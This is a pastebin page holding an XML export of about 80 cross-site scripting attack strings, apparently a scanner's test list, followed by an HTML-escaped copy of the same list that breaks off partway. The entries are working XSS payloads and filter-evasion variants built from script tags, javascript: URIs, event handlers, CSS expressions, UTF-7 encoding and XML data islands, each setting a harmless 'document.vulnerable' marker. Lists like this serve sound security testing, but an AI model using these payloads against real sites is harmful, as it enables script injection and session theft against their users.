xss-strings.xml

From Mustard Anoa, 13 Years ago, written in XML.

URL http://geopaste.scratchbook.ch/view/d634be6c

Embed

<?xml version="1.0"?>

<exportedattacks>

<attacks>

<attack>

<attackString><![CDATA[<meta http-equiv="refresh" content="0;url=javascript:document.vulnerable=true;">]]></attackString>

<signature>Script</signature>

</attack>

<attack>

<attackString><![CDATA[ <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.vulnerable=true</SCRIPT>"> ]]></attackString>

<signature>Script</signature>

</attack>

<attack>

<attackString><![CDATA[ <SCRIPT>document.vulnerable=true;</SCRIPT> ]]></attackString>

<signature>Script</signature>

</attack>

<attack>

<attackString><![CDATA[ <IMG SRC="jav ascript:document.vulnerable=true;"> ]]></attackString>

<signature>Script</signature>

</attack>

<attack>

<attackString><![CDATA[ <IMG SRC="javascript:document.vulnerable=true;"> ]]></attackString>

<signature>Script</signature>

</attack>

<attack>

<attackString><![CDATA[ <IMG SRC="  javascript:document.vulnerable=true;"> ]]></attackString>

<signature>Script</signature>

</attack>

<attack>

<attackString><![CDATA[ <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=document.vulnerable=true;> ]]></attackString>

<signature>Script</signature>

</attack>

<attack>

<attackString><![CDATA[ <<SCRIPT>document.vulnerable=true;//<</SCRIPT> ]]></attackString>

<signature>Script</signature>

</attack>

<attack>

<attackString><![CDATA[ <SCRIPT <B>document.vulnerable=true;</SCRIPT> ]]></attackString>

<signature>Script</signature>

</attack>

<attack>

<attackString><![CDATA[ <IMG SRC="javascript:document.vulnerable=true;" ]]></attackString>

<signature>Script</signature>

</attack>

<attack>

<attackString><![CDATA[ <iframe src="javascript:document.vulnerable=true; < ]]></attackString>

<signature>Script</signature>

</attack>

<attack>

<attackString><![CDATA[ <SCRIPT>a=/XSS/\ndocument.vulnerable=true;</SCRIPT> ]]></attackString>

<signature>Script</signature>

</attack>

<attack>

<attackString><![CDATA[ \";document.vulnerable=true;;// ]]></attackString>

<signature>Script</signature>

</attack>

<attack>

<attackString><![CDATA[ </TITLE><SCRIPT>document.vulnerable=true;</SCRIPT> ]]></attackString>

<signature>Script</signature>

</attack>

<attack>

<attackString><![CDATA[ <INPUT TYPE="IMAGE" SRC="javascript:document.vulnerable=true;"> ]]></attackString>

<signature>Script</signature>

</attack>

<attack>

<attackString><![CDATA[ <BODY BACKGROUND="javascript:document.vulnerable=true;"> ]]></attackString>

<signature>Script</signature>

</attack>

<attack>

<attackString><![CDATA[ <BODY ONLOAD=document.vulnerable=true;> ]]></attackString>

<signature>Script</signature>

</attack>

<attack>

<attackString><![CDATA[ <IMG DYNSRC="javascript:document.vulnerable=true;"> ]]></attackString>

<signature>Script</signature>

</attack>

<attack>

<attackString><![CDATA[ <IMG LOWSRC="javascript:document.vulnerable=true;"> ]]></attackString>

<signature>Script</signature>

</attack>

<attack>

<attackString><![CDATA[ <BGSOUND SRC="javascript:document.vulnerable=true;"> ]]></attackString>

<signature>Script</signature>

</attack>

<attack>

<attackString><![CDATA[ <BR SIZE="&{document.vulnerable=true}"> ]]></attackString>

<signature>Script</signature>

</attack>

<attack>

<attackString><![CDATA[ <LAYER SRC="javascript:document.vulnerable=true;"></LAYER> ]]></attackString>

<signature>Script</signature>

</attack>

<attack>

<attackString><![CDATA[ <LINK REL="stylesheet" HREF="javascript:document.vulnerable=true;"> ]]></attackString>

<signature>Script</signature>

</attack>

<attack>

<attackString><![CDATA[ <STYLE>li {list-style-image: url("javascript:document.vulnerable=true;");</STYLE><UL><LI>XSS ]]></attackString>

<signature>Script</signature>

</attack>

<attack>

<attackString><![CDATA[ ¼script¾document.vulnerable=true;¼/script¾ ]]></attackString>

<signature>Script</signature>

</attack>

<attack>

<attackString><![CDATA[ <IFRAME SRC="javascript:document.vulnerable=true;"></IFRAME> ]]></attackString>

<signature>Script</signature>

</attack>

<attack>

<attackString><![CDATA[ <FRAMESET><FRAME SRC="javascript:document.vulnerable=true;"></FRAMESET> ]]></attackString>

<signature>Script</signature>

</attack>

<attack>

<attackString><![CDATA[ <TABLE BACKGROUND="javascript:document.vulnerable=true;"> ]]></attackString>

<signature>Script</signature>

</attack>

<attack>

<attackString><![CDATA[ <TABLE><TD BACKGROUND="javascript:document.vulnerable=true;"> ]]></attackString>

<signature>Script</signature>

</attack>

<attack>

<attackString><![CDATA[ <DIV STYLE="background-image: url(javascript:document.vulnerable=true;)"> ]]></attackString>

<signature>Script</signature>

</attack>

<attack>

<attackString><![CDATA[ <DIV STYLE="background-image: url(javascript:document.vulnerable=true;)"> ]]></attackString>

<signature>Script</signature>

</attack>

<attack>

<attackString><![CDATA[ <DIV STYLE="width: expression(document.vulnerable=true);"> ]]></attackString>

<signature>Script</signature>

</attack>

<attack>

<attackString><![CDATA[ <STYLE>@im\port'\ja\vasc\ript:document.vulnerable=true';</STYLE> ]]></attackString>

<signature>Script</signature>

</attack>

<attack>

<attackString><![CDATA[ <IMG STYLE="xss:expr/*XSS*/ession(document.vulnerable=true)"> ]]></attackString>

<signature>Script</signature>

</attack>

<attack>

<attackString><![CDATA[ <XSS STYLE="xss:expression(document.vulnerable=true)"> ]]></attackString>

<signature>Script</signature>

</attack>

<attack>

<attackString><![CDATA[ exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(document.vulnerable=true)'> ]]></attackString>

<signature>Script</signature>

</attack>

<attack>

<attackString><![CDATA[ <STYLE TYPE="text/javascript">document.vulnerable=true;</STYLE> ]]></attackString>

<signature>Script</signature>

</attack>

<attack>

<attackString><![CDATA[ <STYLE>.XSS{background-image:url("javascript:document.vulnerable=true");}</STYLE><A CLASS=XSS></A> ]]></attackString>

<signature>Script</signature>

</attack>

<attack>

<attackString><![CDATA[ <STYLE type="text/css">BODY{background:url("javascript:document.vulnerable=true")}</STYLE> ]]></attackString>

<signature>Script</signature>

</attack>

<attack>

<attackString><![CDATA[  ]]></attackString>

<signature>Script</signature>

</attack>

<attack>

<attackString><![CDATA[ <BASE HREF="javascript:document.vulnerable=true;//"> ]]></attackString>

<signature>Script</signature>

</attack>

<attack>

<attackString><![CDATA[ <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.vulnerable=true></OBJECT> ]]></attackString>

<signature>Script</signature>

</attack>

<attack>

<attackString><![CDATA[ <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:document.vulnerable=true;">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> ]]></attackString>

<signature>Script</signature>

</attack>

<attack>

<attackString><![CDATA[ <XML ID="xss"><I><B><IMG SRC="javascript:document.vulnerable=true"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN> ]]></attackString>

<signature>Script</signature>

</attack>

<attack>

<attackString><![CDATA[ <HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>document.vulnerable=true</SCRIPT>"></BODY></HTML> ]]></attackString>

<signature>Script</signature>

</attack>

<attack>

<attackString><![CDATA[ <? echo('<SCR)';echo('IPT>document.vulnerable=true</SCRIPT>'); ?> ]]></attackString>

<signature>Script</signature>

</attack>

<attack>

<attackString><![CDATA[ <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.vulnerable=true;+ADw-/SCRIPT+AD4- ]]></attackString>

<signature>Script</signature>

</attack>

<attack>

<attackString><![CDATA[ <a href="javascript#document.vulnerable=true;"> ]]></attackString>

<signature>Script</signature>

</attack>

<attack>

<attackString><![CDATA[ <div onmouseover="document.vulnerable=true;"> ]]></attackString>

<signature>Script</signature>

</attack>

<attack>

<attackString><![CDATA[ <img src="javascript:document.vulnerable=true;"> ]]></attackString>

<signature>Script</signature>

</attack>

<attack>

<attackString><![CDATA[ <img dynsrc="javascript:document.vulnerable=true;"> ]]></attackString>

<signature>Script</signature>

</attack>

<attack>

<attackString><![CDATA[ <input type="image" dynsrc="javascript:document.vulnerable=true;"> ]]></attackString>

<signature>Script</signature>

</attack>

<attack>

<attackString><![CDATA[ <bgsound src="javascript:document.vulnerable=true;"> ]]></attackString>

<signature>Script</signature>

</attack>

<attack>

<attackString><![CDATA[ &<script>document.vulnerable=true;</script> ]]></attackString>

<signature>Script</signature>

</attack>

<attack>

<attackString><![CDATA[ &{document.vulnerable=true;}; ]]></attackString>

<signature>Script</signature>

</attack>

<attack>

<attackString><![CDATA[ <img src=&{document.vulnerable=true;};> ]]></attackString>

<signature>Script</signature>

</attack>

<attack>

<attackString><![CDATA[ <link rel="stylesheet" href="javascript:document.vulnerable=true;"> ]]></attackString>

<signature>Script</signature>

</attack>

<attack>

<attackString><![CDATA[ <img src="mocha:document.vulnerable=true;"> ]]></attackString>

<signature>Script</signature>

</attack>

<attack>

<attackString><![CDATA[ <img src="livescript:document.vulnerable=true;"> ]]></attackString>

<signature>Script</signature>

</attack>

<attack>

<attackString><![CDATA[ <a href="about:<script>document.vulnerable=true;</script>"> ]]></attackString>

<signature>Script</signature>

</attack>

<attack>

<attackString><![CDATA[ <body onload="document.vulnerable=true;"> ]]></attackString>

<signature>Script</signature>

</attack>

<attack>

<attackString><![CDATA[ <div style="background-image: url(javascript:document.vulnerable=true;);"> ]]></attackString>

<signature>Script</signature>

</attack>

<attack>

<attackString><![CDATA[ <div style="behaviour: url([link to code]);"> ]]></attackString>

<signature>Script</signature>

</attack>

<attack>

<attackString><![CDATA[ <div style="binding: url([link to code]);"> ]]></attackString>

<signature>Script</signature>

</attack>

<attack>

<attackString><![CDATA[ <div style="width: expression(document.vulnerable=true;);"> ]]></attackString>

<signature>Script</signature>

</attack>

<attack>

<attackString><![CDATA[ <style type="text/javascript">document.vulnerable=true;</style> ]]></attackString>

<signature>Script</signature>

</attack>

<attack>

<attackString><![CDATA[ <object classid="clsid:..." codebase="javascript:document.vulnerable=true;"> ]]></attackString>

<signature>Script</signature>

</attack>

<attack>

<attackString><![CDATA[ <style></script> ]]></attackString>

<signature>Script</signature>

</attack>

<attack>

<attackString><![CDATA[ <<script>document.vulnerable=true;</script> ]]></attackString>

<signature>Script</signature>

</attack>

<attack>

<attackString><![CDATA[ <![CDATA[</script> ]]></attackString>

<signature>Script</signature>

</attack>

<attack>

<attackString><![CDATA[ <script>document.vulnerable=true;</script> ]]></attackString>

<signature>Script</signature>

</attack>

<attack>

<attackString><![CDATA[ <img src="blah"onmouseover="document.vulnerable=true;"> ]]></attackString>

<signature>Script</signature>

</attack>

<attack>

<attackString><![CDATA[ <img src="blah>" onmouseover="document.vulnerable=true;"> ]]></attackString>

<signature>Script</signature>

</attack>

<attack>

<attackString><![CDATA[ <xml src="javascript:document.vulnerable=true;"> ]]></attackString>

<signature>Script</signature>

</attack>

<attack>

<attackString><![CDATA[ <xml id="X"><a><b><script>document.vulnerable=true;</script>;</b></a></xml> ]]></attackString>

<signature>Script</signature>

</attack>

<attack>

<attackString><![CDATA[ <div datafld="b" dataformatas="html" datasrc="#X"></div> ]]></attackString>

<signature>Script</signature>

</attack>

<attack>

<attackString><![CDATA[ [\xC0][\xBC]script>document.vulnerable=true;[\xC0][\xBC]/script> ]]></attackString>

<signature>Script</signature>

</attack>

</attacks>

</exportedattacks>

Author

Title

Language

Your paste - Paste your paste here

&lt;?xml version=&quot;1.0&quot;?&gt;
&lt;exportedattacks&gt;
	&lt;attacks&gt;
		&lt;attack&gt;
			&lt;attackString&gt;&lt;![CDATA[&lt;meta http-equiv=&quot;refresh&quot; content=&quot;0;url=javascript:document.vulnerable=true;&quot;&gt;]]&gt;&lt;/attackString&gt;
			&lt;signature&gt;Script&lt;/signature&gt;
		&lt;/attack&gt;
		&lt;attack&gt;
			&lt;attackString&gt;&lt;![CDATA[ &lt;META HTTP-EQUIV=&quot;Set-Cookie&quot; Content=&quot;USERID=&lt;SCRIPT&gt;document.vulnerable=true&lt;/SCRIPT&gt;&quot;&gt; ]]&gt;&lt;/attackString&gt;
			&lt;signature&gt;Script&lt;/signature&gt;
		&lt;/attack&gt;
		&lt;attack&gt;
			&lt;attackString&gt;&lt;![CDATA[ &lt;SCRIPT&gt;document.vulnerable=true;&lt;/SCRIPT&gt; ]]&gt;&lt;/attackString&gt;
			&lt;signature&gt;Script&lt;/signature&gt;
		&lt;/attack&gt;
		&lt;attack&gt;
			&lt;attackString&gt;&lt;![CDATA[ &lt;IMG SRC=&quot;jav ascript:document.vulnerable=true;&quot;&gt; ]]&gt;&lt;/attackString&gt;
			&lt;signature&gt;Script&lt;/signature&gt;
		&lt;/attack&gt;
		&lt;attack&gt;
			&lt;attackString&gt;&lt;![CDATA[ &lt;IMG SRC=&quot;javascript:document.vulnerable=true;&quot;&gt; ]]&gt;&lt;/attackString&gt;
			&lt;signature&gt;Script&lt;/signature&gt;
		&lt;/attack&gt;
		&lt;attack&gt;
			&lt;attackString&gt;&lt;![CDATA[ &lt;IMG SRC=&quot; &amp;#14; javascript:document.vulnerable=true;&quot;&gt; ]]&gt;&lt;/attackString&gt;
			&lt;signature&gt;Script&lt;/signature&gt;
		&lt;/attack&gt;
		&lt;attack&gt;
			&lt;attackString&gt;&lt;![CDATA[ &lt;BODY onload!#$%&amp;()*~+-_.,:;?@[/|\]^`=document.vulnerable=true;&gt; ]]&gt;&lt;/attackString&gt;
			&lt;signature&gt;Script&lt;/signature&gt;
		&lt;/attack&gt;
		&lt;attack&gt;
			&lt;attackString&gt;&lt;![CDATA[ &lt;&lt;SCRIPT&gt;document.vulnerable=true;//&lt;&lt;/SCRIPT&gt; ]]&gt;&lt;/attackString&gt;
			&lt;signature&gt;Script&lt;/signature&gt;
		&lt;/attack&gt;
		&lt;attack&gt;
			&lt;attackString&gt;&lt;![CDATA[ &lt;SCRIPT &lt;B&gt;document.vulnerable=true;&lt;/SCRIPT&gt; ]]&gt;&lt;/attackString&gt;
			&lt;signature&gt;Script&lt;/signature&gt;
		&lt;/attack&gt;
		&lt;attack&gt;
			&lt;attackString&gt;&lt;![CDATA[ &lt;IMG SRC=&quot;javascript:document.vulnerable=true;&quot; ]]&gt;&lt;/attackString&gt;
			&lt;signature&gt;Script&lt;/signature&gt;
		&lt;/attack&gt;
		&lt;attack&gt;
			&lt;attackString&gt;&lt;![CDATA[ &lt;iframe src=&quot;javascript:document.vulnerable=true; &lt; ]]&gt;&lt;/attackString&gt;
			&lt;signature&gt;Script&lt;/signature&gt;
		&lt;/attack&gt;
		&lt;attack&gt;
			&lt;attackString&gt;&lt;![CDATA[ &lt;SCRIPT&gt;a=/XSS/\ndocument.vulnerable=true;&lt;/SCRIPT&gt; ]]&gt;&lt;/attackString&gt;
			&lt;signature&gt;Script&lt;/signature&gt;
		&lt;/attack&gt;
		&lt;attack&gt;
			&lt;attackString&gt;&lt;![CDATA[ \&quot;;document.vulnerable=true;;// ]]&gt;&lt;/attackString&gt;
			&lt;signature&gt;Script&lt;/signature&gt;
		&lt;/attack&gt;
		&lt;attack&gt;
			&lt;attackString&gt;&lt;![CDATA[ &lt;/TITLE&gt;&lt;SCRIPT&gt;document.vulnerable=true;&lt;/SCRIPT&gt; ]]&gt;&lt;/attackString&gt;
			&lt;signature&gt;Script&lt;/signature&gt;
		&lt;/attack&gt;
		&lt;attack&gt;
			&lt;attackString&gt;&lt;![CDATA[ &lt;INPUT TYPE=&quot;IMAGE&quot; SRC=&quot;javascript:document.vulnerable=true;&quot;&gt; ]]&gt;&lt;/attackString&gt;
			&lt;signature&gt;Script&lt;/signature&gt;
		&lt;/attack&gt;
		&lt;attack&gt;
			&lt;attackString&gt;&lt;![CDATA[ &lt;BODY BACKGROUND=&quot;javascript:document.vulnerable=true;&quot;&gt; ]]&gt;&lt;/attackString&gt;
			&lt;signature&gt;Script&lt;/signature&gt;
		&lt;/attack&gt;
		&lt;attack&gt;
			&lt;attackString&gt;&lt;![CDATA[ &lt;BODY ONLOAD=document.vulnerable=true;&gt; ]]&gt;&lt;/attackString&gt;
			&lt;signature&gt;Script&lt;/signature&gt;
		&lt;/attack&gt;
		&lt;attack&gt;
			&lt;attackString&gt;&lt;![CDATA[ &lt;IMG DYNSRC=&quot;javascript:document.vulnerable=true;&quot;&gt; ]]&gt;&lt;/attackString&gt;
			&lt;signature&gt;Script&lt;/signature&gt;
		&lt;/attack&gt;
		&lt;attack&gt;
			&lt;attackString&gt;&lt;![CDATA[ &lt;IMG LOWSRC=&quot;javascript:document.vulnerable=true;&quot;&gt; ]]&gt;&lt;/attackString&gt;
			&lt;signature&gt;Script&lt;/signature&gt;
		&lt;/attack&gt;
		&lt;attack&gt;
			&lt;attackString&gt;&lt;![CDATA[ &lt;BGSOUND SRC=&quot;javascript:document.vulnerable=true;&quot;&gt; ]]&gt;&lt;/attackString&gt;
			&lt;signature&gt;Script&lt;/signature&gt;
		&lt;/attack&gt;
		&lt;attack&gt;
			&lt;attackString&gt;&lt;![CDATA[ &lt;BR SIZE=&quot;&amp;{document.vulnerable=true}&quot;&gt; ]]&gt;&lt;/attackString&gt;
			&lt;signature&gt;Script&lt;/signature&gt;
		&lt;/attack&gt;
		&lt;attack&gt;
			&lt;attackString&gt;&lt;![CDATA[ &lt;LAYER SRC=&quot;javascript:document.vulnerable=true;&quot;&gt;&lt;/LAYER&gt; ]]&gt;&lt;/attackString&gt;
			&lt;signature&gt;Script&lt;/signature&gt;
		&lt;/attack&gt;
		&lt;attack&gt;
			&lt;attackString&gt;&lt;![CDATA[ &lt;LINK REL=&quot;stylesheet&quot; HREF=&quot;javascript:document.vulnerable=true;&quot;&gt; ]]&gt;&lt;/attackString&gt;
			&lt;signature&gt;Script&lt;/signature&gt;
		&lt;/attack&gt;
		&lt;attack&gt;
			&lt;attackString&gt;&lt;![CDATA[ &lt;STYLE&gt;li {list-style-image: url(&quot;javascript:document.vulnerable=true;&quot;);&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS ]]&gt;&lt;/attackString&gt;
			&lt;signature&gt;Script&lt;/signature&gt;
		&lt;/attack&gt;
		&lt;attack&gt;
			&lt;attackString&gt;&lt;![CDATA[ ¼script¾document.vulnerable=true;¼/script¾ ]]&gt;&lt;/attackString&gt;
			&lt;signature&gt;Script&lt;/signature&gt;
		&lt;/attack&gt;
		&lt;attack&gt;
			&lt;attackString&gt;&lt;![CDATA[ &lt;IFRAME SRC=&quot;javascript:document.vulnerable=true;&quot;&gt;&lt;/IFRAME&gt; ]]&gt;&lt;/attackString&gt;
			&lt;signature&gt;Script&lt;/signature&gt;
		&lt;/attack&gt;
		&lt;attack&gt;
			&lt;attackString&gt;&lt;![CDATA[ &lt;FRAMESET&gt;&lt;FRAME SRC=&quot;javascript:document.vulnerable=true;&quot;&gt;&lt;/FRAMESET&gt; ]]&gt;&lt;/attackString&gt;
			&lt;signature&gt;Script&lt;/signature&gt;
		&lt;/attack&gt;
		&lt;attack&gt;
			&lt;attackString&gt;&lt;![CDATA[ &lt;TABLE BACKGROUND=&quot;javascript:document.vulnerable=true;&quot;&gt; ]]&gt;&lt;/attackString&gt;
			&lt;signature&gt;Script&lt;/signature&gt;
		&lt;/attack&gt;
		&lt;attack&gt;
			&lt;attackString&gt;&lt;![CDATA[ &lt;TABLE&gt;&lt;TD BACKGROUND=&quot;javascript:document.vulnerable=true;&quot;&gt; ]]&gt;&lt;/attackString&gt;
			&lt;signature&gt;Script&lt;/signature&gt;
		&lt;/attack&gt;
		&lt;attack&gt;
			&lt;attackString&gt;&lt;![CDATA[ &lt;DIV STYLE=&quot;background-image: url(javascript:document.vulnerable=true;)&quot;&gt; ]]&gt;&lt;/attackString&gt;
			&lt;signature&gt;Script&lt;/signature&gt;
		&lt;/attack&gt;
		&lt;attack&gt;
			&lt;attackString&gt;&lt;![CDATA[ &lt;DIV STYLE=&quot;background-image: url(&amp;#1;javascript:document.vulnerable=true;)&quot;&gt; ]]&gt;&lt;/attackString&gt;
			&lt;signature&gt;Script&lt;/signature&gt;
		&lt;/attack&gt;
		&lt;attack&gt;
			&lt;attackString&gt;&lt;![CDATA[ &lt;DIV STYLE=&quot;width: expression(document.vulnerable=true);&quot;&gt; ]]&gt;&lt;/attackString&gt;
			&lt;signature&gt;Script&lt;/signature&gt;
		&lt;/attack&gt;
		&lt;attack&gt;
			&lt;attackString&gt;&lt;![CDATA[ &lt;STYLE&gt;@im\port'\ja\vasc\ript:document.vulnerable=true';&lt;/STYLE&gt; ]]&gt;&lt;/attackString&gt;
			&lt;signature&gt;Script&lt;/signature&gt;
		&lt;/attack&gt;
		&lt;attack&gt;
			&lt;attackString&gt;&lt;![CDATA[ &lt;IMG STYLE=&quot;xss:expr/*XSS*/ession(document.vulnerable=true)&quot;&gt; ]]&gt;&lt;/attackString&gt;
			&lt;signature&gt;Script&lt;/signature&gt;
		&lt;/attack&gt;
		&lt;attack&gt;
			&lt;attackString&gt;&lt;![CDATA[ &lt;XSS STYLE=&quot;xss:expression(document.vulnerable=true)&quot;&gt; ]]&gt;&lt;/attackString&gt;
			&lt;signature&gt;Script&lt;/signature&gt;
		&lt;/attack&gt;
		&lt;attack&gt;
			&lt;attackString&gt;&lt;![CDATA[ exp/*&lt;A STYLE='no\xss:noxss(&quot;*//*&quot;);xss:ex/*XSS*//*/*/pression(document.vulnerable=true)'&gt; ]]&gt;&lt;/attackString&gt;
			&lt;signature&gt;Script&lt;/signature&gt;
		&lt;/attack&gt;
		&lt;attack&gt;
			&lt;attackString&gt;&lt;![CDATA[ &lt;STYLE TYPE=&quot;text/javascript&quot;&gt;document.vulnerable=true;&lt;/STYLE&gt; ]]&gt;&lt;/attackString&gt;
			&lt;signature&gt;Script&lt;/signature&gt;
		&lt;/attack&gt;
		&lt;attack&gt;
			&lt;attackString&gt;&lt;![CDATA[ &lt;STYLE&gt;.XSS{background-image:url(&quot;javascript:document.vulnerable=true&quot;);}&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt; ]]&gt;&lt;/attackString&gt;
			&lt;signature&gt;Script&lt;/signature&gt;
		&lt;/attack&gt;
		&lt;attack&gt;
			&lt;attackString&gt;&lt;![CDATA[ &lt;STYLE type=&quot;text/css&quot;&gt;BODY{background:url(&quot;javascript:document.vulnerable=true&quot;)}&lt;/STYLE&gt; ]]&gt;&lt;/attackString&gt;
			&lt;signature&gt;Script&lt;/signature&gt;
		&lt;/attack&gt;
		&lt;attack&gt;
			&lt;attackString&gt;&lt;![CDATA[ &lt;!--[if gte IE 4]&gt;&lt;SCRIPT&gt;document.vulnerable=true;&lt;/SCRIPT&gt;&lt;![endif]--&gt; ]]&gt;&lt;/attackString&gt;
			&lt;signature&gt;Script&lt;/signature&gt;
		&lt;/attack&gt;
		&lt;attack&gt;
			&lt;attackString&gt;&lt;![CDATA[ &lt;BASE HREF=&quot;javascript:document.vulnerable=true;//&quot;&gt; ]]&gt;&lt;/attackString&gt;
			&lt;signature&gt;Script&lt;/signature&gt;
		&lt;/attack&gt;
		&lt;attack&gt;
			&lt;attackString&gt;&lt;![CDATA[ &lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&gt;&lt;param name=url value=javascript:document.vulnerable=true&gt;&lt;/OBJECT&gt; ]]&gt;&lt;/attackString&gt;
			&lt;signature&gt;Script&lt;/signature&gt;
		&lt;/attack&gt;
		&lt;attack&gt;
			&lt;attackString&gt;&lt;![CDATA[ &lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;![CDATA[&lt;IMG SRC=&quot;javas]]&lt;![CDATA[cript:document.vulnerable=true;&quot;&gt;]]&lt;/C&gt;&lt;/X&gt;&lt;/xml&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt; ]]&gt;&lt;/attackString&gt;
			&lt;signature&gt;Script&lt;/signature&gt;
		&lt;/attack&gt;
		&lt;attack&gt;
			&lt;attackString&gt;&lt;![CDATA[ &lt;XML ID=&quot;xss&quot;&gt;&lt;I&gt;&lt;B&gt;&lt;IMG SRC=&quot;javas&lt;!-- --&gt;cript:document.vulnerable=true&quot;&gt;&lt;/B&gt;&lt;/I&gt;&lt;/XML&gt;&lt;SPAN DATASRC=&quot;#xss&quot; DATAFLD=&quot;B&quot; DATAFORMATAS=&quot;HTML&quot;&gt;&lt;/SPAN&gt; ]]&gt;&lt;/attackString&gt;
			&lt;signature&gt;Script&lt;/signature&gt;
		&lt;/attack&gt;
		&lt;attack&gt;
			&lt;attackString&gt;&lt;![CDATA[ &lt;HTML&gt;&lt;BODY&gt;&lt;?xml:namespace prefix=&quot;t&quot; ns=&quot;urn:schemas-microsoft-com:time&quot;&gt;&lt;?import namespace=&quot;t&quot; implementation=&quot;#default#time2&quot;&gt;&lt;t:set attributeName=&quot;innerHTML&quot; to=&quot;XSS&lt;SCRIPT DEFER&gt;document.vulnerable=true&lt;/SCRIPT&gt;&quot;&gt;&lt;/BODY&gt;&lt;/HTML&gt; ]]&gt;&lt;/attackString&gt;
			&lt;signature&gt;Script&lt;/signature&gt;
		&lt;/attack&gt;
		&lt;attack&gt;
			&lt;attackString&gt;&lt;![CDATA[ &lt;? echo('&lt;SCR)';echo('IPT&gt;document.vulnerable=true&lt;/SCRIPT&gt;'); ?&gt; ]]&gt;&lt;/attackString&gt;
			&lt;signature&gt;Script&lt;/signature&gt;
		&lt;/attack&gt;
		&lt;attack&gt;
			&lt;attackString&gt;&lt;![CDATA[ &lt;HEAD&gt;&lt;META HTTP-EQUIV=&quot;CONTENT-TYPE&quot; CONTENT=&quot;text/html; charset=UTF-7&quot;&gt; &lt;/HEAD&gt;+ADw-SCRIPT+AD4-document.vulnerable=true;+ADw-/SCRIPT+AD4- ]]&gt;&lt;/attackString&gt;
			&lt;signature&gt;Script&lt;/signature&gt;
		&lt;/attack&gt;
		&lt;attack&gt;
			&lt;attackString&gt;&lt;![CDATA[ &lt;a href=&quot;javascript#document.vulnerable=true;&quot;&gt; ]]&gt;&lt;/attackString&gt;
			&lt;signature&gt;Script&lt;/signature&gt;
		&lt;/attack&gt;
		&lt;attack&gt;
			&lt;attackString&gt;&lt;![CDATA[ &lt;div onmouseover=&quot;document.vulnerable=true;&quot;&gt; ]]&gt;&lt;/attackString&gt;
			&lt;signature&gt;Script&lt;/signature&gt;
		&lt;/attack&gt;
		&lt;attack&gt;
			&lt;attackString&gt;&lt;![CDATA[ &lt;img src=&quot;javascript:document.vulnerable=true;&quot;&gt; ]]&gt;&lt;/attackString&gt;
			&lt;signature&gt;Script&lt;/signature&gt;
		&lt;/attack&gt;
		&lt;attack&gt;
			&lt;attackString&gt;&lt;![CDATA[ &lt;img dynsrc=&quot;javascript:document.vulnerable=true;&quot;&gt; ]]&gt;&lt;/attackString&gt;
			&lt;signature&gt;Script&lt;/signature&gt;
		&lt;/attack&gt;
		&lt;attack&gt;
			&lt;attackString&gt;&lt;![CDATA[ &lt;input type=&quot;image&quot; dynsrc=&quot;javascript:document.vulnerable=true;&quot;&gt; ]]&gt;&lt;/attackString&gt;
			&lt;signature&gt;Script&lt;/signature&gt;
		&lt;/attack&gt;
		&lt;attack&gt;
			&lt;attackString&gt;&lt;![CDATA[ &lt;bgsound src=&quot;javascript:document.vulnerable=true;&quot;&gt; ]]&gt;&lt;/attackString&gt;
			&lt;signature&gt;Script&lt;/signature&gt;
		&lt;/attack&gt;
		&lt;attack&gt;
			&lt;attackString&gt;&lt;![CDATA[ &amp;&lt;script&gt;document.vulnerable=true;&lt;/script&gt; ]]&gt;&lt;/attackString&gt;
			&lt;signature&gt;Script&lt;/signature&gt;
		&lt;/attack&gt;
		&lt;attack&gt;
			&lt;attackString&gt;&lt;![CDATA[ &amp;{document.vulnerable=true;}; ]]&gt;&lt;/attackString&gt;
			&lt;signature&gt;Script&lt;/signature&gt;
		&lt;/attack&gt;
		&lt;attack&gt;
			&lt;attackString&gt;&lt;![CDATA[ &lt;img src=&amp;{document.vulnerable=true;};&gt; ]]&gt;&lt;/attackString&gt;
			&lt;signature&gt;Script&lt;/signature&gt;
		&lt;/attack&gt;
		&lt;attack&gt;
			&lt;attackString&gt;&lt;![CDATA[ &lt;link rel=&quot;stylesheet&quot; href=&quot;javascript:document.vulnerable=true;&quot;&gt; ]]&gt;&lt;/attackString&gt;
			&lt;signature&gt;Script&lt;/signature&gt;
		&lt;/attack&gt;
		&lt;attack&gt;
			&lt;attackString&gt;&lt;![CDATA[ &lt;img src=&quot;mocha:document.vulnerable=true;&quot;&gt; ]]&gt;&lt;/attackString&gt;
			&lt;signature&gt;Script&lt;/signature&gt;
		&lt;/attack&gt;
		&lt;attack&gt;
			&lt;attackString&gt;&lt;![CDATA[ &lt;img src=&quot;livescript:document.vulnerable=true;&quot;&gt; ]]&gt;&lt;/attackString&gt;
			&lt;signature&gt;Script&lt;/signature&gt;
		&lt;/attack&gt;
		&lt;attack&gt;
			&lt;attackString&gt;&lt;![CDATA[ &lt;a href=&quot;about:&lt;script&gt;document.vulnerable=true;&lt;/script&gt;&quot;&gt; ]]&gt;&lt;/attackString&gt;
			&lt;signature&gt;Script&lt;/signature&gt;
		&lt;/attack&gt;
		&lt;attack&gt;
			&lt;attackString&gt;&lt;![CDATA[ &lt;body onload=&quot;document.vulnerable=true;&quot;&gt; ]]&gt;&lt;/attackString&gt;
			&lt;signature&gt;Script&lt;/signature&gt;
		&lt;/attack&gt;
		&lt;attack&gt;
			&lt;attackString&gt;&lt;![CDATA[ &lt;div style=&quot;background-image: url(javascript:document.vulnerable=true;);&quot;&gt; ]]&gt;&lt;/attackString&gt;
			&lt;signature&gt;Script&lt;/signature&gt;
